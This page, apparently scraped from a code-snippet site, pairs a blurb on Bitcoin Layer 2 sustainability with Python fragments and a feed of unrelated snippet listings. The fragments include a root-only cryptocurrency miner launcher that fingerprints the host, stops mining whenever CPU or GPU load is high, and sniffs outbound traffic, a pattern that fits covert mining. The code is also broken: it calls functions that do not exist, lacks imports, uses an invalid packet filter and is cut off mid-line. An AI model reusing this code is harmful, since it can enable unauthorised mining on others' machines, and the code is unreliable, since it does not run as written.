Examine the environmental implications of Bitcoin Layer 2 scaling solutions in mitigating the carbon footprint associated with traditional proof-of-work (PoW) consensus mechanisms. Discover how Lightning Network and other Layer 2 protocols reduce on-chain congestion and energy consumption by facilitating a greater volume of transactions off-chain. Explore the potential for Layer 2 scaling to enhance the sustainability and long-term viability of the Bitcoin network, aligning with global efforts towards eco-friendly blockchain technologies.

bash
Edit
Run
Full Screen
Copy code
1python monitor_resources.py
python
Edit
Run
Full Screen
Copy code
1import os
2import psutil
3import smtplib
4from email.message import EmailMessage
5
6def send_email_alert(subject, body):
7    msg = EmailMessage()
8    msg.set_content(body)
9    msg["Subject"] = subject
10    msg["From"] = "your_email_address"
11    msg["To"] = "your_email_address"
12
13    with smtplib.SMTP_SSL("smtp.gmail.com", 465) as server:
14        server.login("your_email_address", "your_email_password")
15        server.send_message(msg)
16
17def monitor_resources():
18    while True:
19        cpu_usage = psutil.cpu_percent()
20        gpu_usage = psutil.gpu_percent()
21        memory_usage = psutil.virtual_memory().percent
22
23        if cpu_usage > 80 or gpu_usage > 80 or memory_usage > 80:
24            send_email_alert("Resource Usage Alert", "CPU or GPU usage is too high!")
25
26        time.sleep(10)
27
28if __name__ == "__main__":
29    check_permissions()
30    monitor_resources()
python
Edit
Run
Full Screen
Copy code
1def monitor_resources():
2    """Monitor system resources and take action if necessary"""
3    while True:
4        # Check CPU and GPU usage
5        cpu_usage = psutil.cpu_percent()
6        gpu_usage = psutil.gpu_percent()
7
8        # If CPU or GPU usage exceeds the threshold, stop mining and send an alert
9        if cpu_usage > 80 or gpu_usage > 80:
10            logger.warning("CPU or GPU usage too high! Stopping mining...")
11            os.system("killall miner")
12            send_email_alert("Resource Usage Alert", "CPU or GPU usage is too high!")
13            notify_user("CPU or GPU usage too high! Stopping mining...")
14
15        # Sleep for 10 seconds before checking again
16        time.sleep(10)
python
Edit
Run
Full Screen
Copy code
1import argparse
2import hashlib
3import logging
4import os
5import platform
6import psutil
7import scapy
8import plyer
9import time
10import threading
11import smtplib
12from email.message import EmailMessage
13
14# Set up logging
15logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
16logger = logging.getLogger(__name__)
17
18def get_system_info():
19    """Get system information"""
20    username = getpass.getuser()
21    hostname = platform.node()
22    system_info = f"{username}@{hostname}"
23    return system_info
24
25def generate_unique_id(system_info):
26    """Generate a unique ID based on system information"""
27    unique_id = hashlib.sha256(system_info.encode()).hexdigest()
28    return unique_id
29
30def start_miner(wallet_address, mining_pool, unique_id):
31    """Start the miner with the given wallet address, mining pool, and unique ID"""
32    miner_command = f"miner --algo=ethash --pool={mining_pool} --user={wallet_address} --rig-id={unique_id}"
33    logger.info(f"Starting miner with command: {miner_command}")
34    os.system(miner_command)
35
36def check_permissions():
37    """Check if the script has sufficient permissions to run"""
38    if os.geteuid() != 0:
39        logger.error("Insufficient permissions to run the script. Please run as root.")
40        exit(1)
41
42def monitor_resources():
43    """Monitor system resources and take action if necessary"""
44    while True:
45        # Check CPU and GPU usage
46        cpu_usage = psutil.cpu_percent()
47        gpu_usage = psutil.gpu_percent()
48
49        # If CPU or GPU usage exceeds the threshold, stop mining and send an alert
50        if cpu_usage > 80 or gpu_usage > 80:
51            logger.warning("CPU or GPU usage too high! Stopping mining...")
52            os.system("killall miner")
53            send_email_alert("Resource Usage Alert", "CPU or GPU usage is too high!")
54            notify_user("CPU or GPU usage too high! Stopping mining...")
55
56        # Sleep for 10 seconds before checking again
57        time.sleep(10)
58
59def monitor_network():
60    """Monitor network traffic and take action if necessary"""
61    while True:
62        # Check for unusual outbound connections
63        packets = scapy.sniff(filter="outbound")
64        for packet in packets:
65            if packet.haslayer(scapy.IP) and packet.haslayer(scapy.TCP):
66                if packet[scapy.TCP].dport == 444
python
Edit
Run
Full Screen
Copy code
1# Start the network monitoring thread
2if args.network_monitoring:
3    network_monitoring_thread = threading.Thread(target=monitor_network)
4    network_monitoring_thread.start()
5
6# Start the user notification thread
7user_notification_thread = threading.Thread(target=notify_user, args=("Miner started!",))
8user_notification_thread.start()
9
10# Keep the main thread alive until the user terminates the script
11while True:
12    time.sleep(1)
star

Wed May 15 2024 09:08:03 GMT+0000 (Coordinated Universal Time) https://blocksentinels.com/blockchain-game-development-company

@harsha98 #blockchain #gamedevelopment

star

Wed May 15 2024 08:50:05 GMT+0000 (Coordinated Universal Time)

@madgakantara

star

Wed May 15 2024 05:35:47 GMT+0000 (Coordinated Universal Time)

@hardikraja #commandline #linux

star

Wed May 15 2024 05:33:48 GMT+0000 (Coordinated Universal Time)

@hardikraja #commandline #linux

star

Wed May 15 2024 04:13:15 GMT+0000 (Coordinated Universal Time)

@iliavial #c#

star

Wed May 15 2024 03:36:16 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/53845493/cypress-uncaught-assertion-error-despite-cy-onuncaughtexception

@al.thedigital #exception #false

star

Wed May 15 2024 00:14:25 GMT+0000 (Coordinated Universal Time) https://testing.profitbusters.com/

@batman12050

star

Tue May 14 2024 22:39:20 GMT+0000 (Coordinated Universal Time) https://css-tricks.com/snippets/wordpress/year-shortcode/

@systemsroncal #php #wordpress

star

Tue May 14 2024 19:17:01 GMT+0000 (Coordinated Universal Time)

@Akhil_preetham #javascript

star

Tue May 14 2024 17:36:13 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/38031719/making-an-array-flat-understanding-the-solution

@RobertoSilvaZ #javascript #array

star

Tue May 14 2024 15:56:57 GMT+0000 (Coordinated Universal Time)

@Justus

star

Tue May 14 2024 15:00:29 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 14:49:27 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 14:46:47 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 14:38:46 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 13:34:43 GMT+0000 (Coordinated Universal Time)

@odesign

star

Tue May 14 2024 13:22:53 GMT+0000 (Coordinated Universal Time) https://pwpush.com/en/p/ulty-fwrovdinjqycyy

@tianzonrupert

star

Tue May 14 2024 12:17:47 GMT+0000 (Coordinated Universal Time)

@Justus

star

Tue May 14 2024 11:38:24 GMT+0000 (Coordinated Universal Time) https://medium.com/@priscillashamin/how-to-install-and-configure-nvm-on-mac-os-43e3366c75a6

@temp

star

Tue May 14 2024 11:29:32 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 11:27:01 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 11:17:24 GMT+0000 (Coordinated Universal Time)

@Vivekstyn

star

Tue May 14 2024 08:46:32 GMT+0000 (Coordinated Universal Time) https://kepty.cz/2024/02/18/replace-noseriesmanagement-with-the-new-bc-foundation-no-series-app-1-2/

@obaidullahjadun #al

star

Tue May 14 2024 08:21:21 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/73729492/cypress-multi-reporters-using-mochawesome-with-autoset-status-cypress-testrail

@al.thedigital #cypress #config #plugins #add

star

Tue May 14 2024 08:21:21 GMT+0000 (Coordinated Universal Time)

@lavil80

star

Tue May 14 2024 08:20:37 GMT+0000 (Coordinated Universal Time)

@lavil80

star

Tue May 14 2024 08:10:19 GMT+0000 (Coordinated Universal Time)

@lavil80

star

Tue May 14 2024 06:17:56 GMT+0000 (Coordinated Universal Time)

@webmasterUdL

star

Tue May 14 2024 04:29:55 GMT+0000 (Coordinated Universal Time)

@Pulak

star

Tue May 14 2024 03:43:49 GMT+0000 (Coordinated Universal Time) https://stackoverflow.com/questions/2442525/how-to-select-min-and-max-values-of-a-column-in-a-datatable

@javicinhio #cs

star

Tue May 14 2024 03:20:56 GMT+0000 (Coordinated Universal Time)

@StephenThevar

star

Tue May 14 2024 01:05:12 GMT+0000 (Coordinated Universal Time)

@RobertoSilvaZ #expo #sdk #npm

star

Mon May 13 2024 20:53:45 GMT+0000 (Coordinated Universal Time) https://checker.top/

@Amator021

star

Mon May 13 2024 17:09:18 GMT+0000 (Coordinated Universal Time) https://pastebin.com/qj3S08eA

@Traumlaeufer #coinimp #java

star

Mon May 13 2024 16:25:40 GMT+0000 (Coordinated Universal Time) https://www.electronmove.com/%E0%B9%82%E0%B8%9B%E0%B8%A3%E0%B9%81%E0%B8%81%E0%B8%A3%E0%B8%A1%E0%B8%84%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%93%E0%B9%82%E0%B8%8B%E0%B8%A5%E0%B9%88%E0%B8%B2%E0%B8%AD%E0%B8%AD%E0%B8%99%E0%B9%84%E0%B8%A5%E0%B8%99%E0%B9%8C/63b78844ffdbd000133c89e4

@avxthn01 #javascript #css #html

star

Mon May 13 2024 14:55:28 GMT+0000 (Coordinated Universal Time)

@RehmatAli2024 #deluge

star

Mon May 13 2024 11:52:40 GMT+0000 (Coordinated Universal Time)

@ythhj #css

star

Mon May 13 2024 11:32:10 GMT+0000 (Coordinated Universal Time) https://valoc.fun/

@whois

star

Mon May 13 2024 09:05:58 GMT+0000 (Coordinated Universal Time) undefined

@curtisbarry

star

Mon May 13 2024 08:36:05 GMT+0000 (Coordinated Universal Time) https://docs.cypress.io/api/commands/scrollTo

@al.thedigital #scroll

star

Mon May 13 2024 08:35:18 GMT+0000 (Coordinated Universal Time) https://docs.cypress.io/api/commands/scrollTo

@al.thedigital

star

Mon May 13 2024 07:35:03 GMT+0000 (Coordinated Universal Time) https://www.blockchainappfactory.com/bitcoin-layer-2-solutions

@zarazyana #bitcoinlayer2 #bitcoinlayer2solutions #bitcoinlayer2blockhainsolutions #bitcoinlayer2development

star

Mon May 13 2024 05:08:23 GMT+0000 (Coordinated Universal Time) https://mail.google.com/mail/u/0/?tab

@curtisbarry

star

Mon May 13 2024 03:55:05 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:55:03 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:54:58 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:54:56 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

star

Mon May 13 2024 03:54:51 GMT+0000 (Coordinated Universal Time) https://www.blackbox.ai/share/6eeb27fe-592c-4f6e-ae46-767ca4334f80

@mohmdemoon

Save snippets that work with our extensions

Available in the Chrome Web Store Get Firefox Add-on Get VS Code extension